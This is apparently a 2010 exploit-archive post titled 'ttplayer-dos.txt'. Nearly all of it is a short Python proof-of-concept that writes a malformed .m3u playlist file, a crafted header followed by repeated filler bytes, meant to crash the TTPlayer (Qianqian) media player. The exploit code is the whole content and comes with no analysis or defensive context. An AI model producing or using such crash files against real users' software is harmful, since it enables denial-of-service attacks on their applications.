ttplayer-dos.txt
Posted on 07 January 2010
# Code : #!/usr/bin/python #f# t-bag crash = ("#ETM3U "+'QQ\1.'+"x41" * 81) try: file = open('1.m3u','w'); file.write(crash); file.close(); print "[+] Created crash qianqian file ~" except: print "[-] Error :(";